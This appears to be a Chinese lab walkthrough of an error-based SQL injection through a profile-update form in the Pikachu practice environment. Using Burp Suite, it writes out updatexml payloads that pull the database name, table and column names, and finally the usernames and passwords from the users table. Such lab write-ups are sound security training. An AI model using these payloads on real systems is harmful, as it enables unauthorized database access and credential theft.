SQL注入——update注入(pikachu)

第一步:访问目标站点,注册一个账号xiaosan:123456,并登录
SQL注入——update注入(pikachu)_第1张图片
第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456
SQL注入——update注入(pikachu)_第2张图片
拦截数据包,右键发送到Repeater
SQL注入——update注入(pikachu)_第3张图片
第三步:测试注入点
正常请求页面
SQL注入——update注入(pikachu)_第4张图片
输入单引号测试注入点页面
SQL注入——update注入(pikachu)_第5张图片
第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字
1’ or updatexml(1,concat(0x7e,database()),0) or’
SQL注入——update注入(pikachu)_第6张图片
第五步:获取当前网站所连接的数据库的版本号
SQL注入——update注入(pikachu)_第7张图片
第六步:获取当前WEB网站所连接的数据库pikachu中全部的表名信息
1’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘pikachu’)),1) or ‘1
SQL注入——update注入(pikachu)_第8张图片
第七步:获取当前WEB网站所连接的数据库pikachu中表users中的全部列名信息
1’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘pikachu’ and table_name=‘users’)),1) or ‘1
SQL注入——update注入(pikachu)_第9张图片
第八步:获取当前WEB网站所连接的数据库pikachu中表users中username、password列的字段内容
1’ or updatexml(1,concat(0x7e,(select group_concat(username,’@’,password) from pikachu.users)),1) or '1
SQL注入——update注入(pikachu)_第10张图片

你可能感兴趣的:(SQL注入)